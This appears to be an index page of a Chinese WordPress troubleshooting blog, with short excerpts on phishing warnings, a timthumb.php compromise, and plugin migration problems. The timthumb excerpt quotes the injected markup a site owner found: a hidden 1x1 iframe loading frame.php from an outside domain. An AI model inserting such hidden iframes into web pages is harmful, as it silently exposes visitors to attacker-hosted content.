WP笔记

How To Remove “Warning: Suspected phishing site”

Firefox和Chrome浏览器都具备防欺诈网站过滤器的功能。google除了有malware list,还有一个phishing list(钓鱼网站列表)。注意这两个列表是不同的。如果你的网站被黑,有恶意代码,那么google搜索结果中会提示该网站含有恶意代码等等,如果被列入phishing list,搜索结果里不会有提示,但用户通过Firefox或者Chrome访问网站时会提示Warning: Suspected phishing site

继续阅读How To Remove “Warning: Suspected phishing site”
WP笔记

timthumb漏洞导致iframe攻击,wp-settings.php被修改

wordpress主题中一个很常用的处理图片的工具timthumb.php因为远程存储文件时候的验证上不足而产生了漏洞,允许在cache文件夹中执行一些php脚本,这已经不是什么秘密,可我就是中了招。 某天打开网站,发现服务器上所有的wordpress网站在firefox中都会打开一个弹出窗口,提示下载frame.php,这应该不是代码本意,不知道我的firefox出了啥问题,其实是在源代码里多了隐藏的iframe,用firebug查看源代码,可以看到下面的内容

<iframe id="iframe" src="%20http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px;">

继续阅读timthumb漏洞导致iframe攻击,wp-settings.php被修改
WP笔记

WP eStore移植后数据全部丢失

今天折腾的WP网站装了个收费的ecommerce插件,叫WP eStore,说实话感觉这个插件并不比免费的强大多少,还是很多人买。按照移植WordPress的方法折腾完,看起来很不错一切都没问题,访问到Store页面的时候,问题来了,eStore的shortcode报错,说指定的id不存在咋回事。

继续阅读WP eStore移植后数据全部丢失
WP笔记

为wp featured content slider plugin添加pager功能

1. wp featured content slider 插件简单介绍

wp featured content slider是一款wordpress的幻灯片(slideshow)插件,你可以在post的编辑页面将post指定为featured post,这样它就可以在featured content slider中显示。该插件的特色是图片(post中的图片或通过custom field定义的图片)显示在banner右侧,post文字内容显示在左侧,是名副其实的content slider。另外该插件提供功能选项,使你可以自由切换幻灯片效果、切换速度、背景色。幻灯片带有箭头是导航按钮。效果图如下

继续阅读为wp featured content slider plugin添加pager功能
WP笔记

wp-e-commerce后台缩略图不显示

移植wordpress+w-e-commerce的网站要注意wp-e-commerce的路径,在移植wordpress时,我们一般会做两件事:

1.导入文件,修改文件夹权限,修改配置文件等等。

2. 将保存好的数据库用记事本打开,搜索原来的域名,假设是在本地,我们会搜索类似"localhost/wordpress"并替换为目标地址域名www.mydomain.com。

如果我们忽略了搜索绝对地址,可能问题就要出现了。对于wp-e-commerce需要获取上传地址,如果地址不存在,就会发生缩略图不显示的情况,并且后台显示报错信息

The following directories are not writable:

继续阅读wp-e-commerce后台缩略图不显示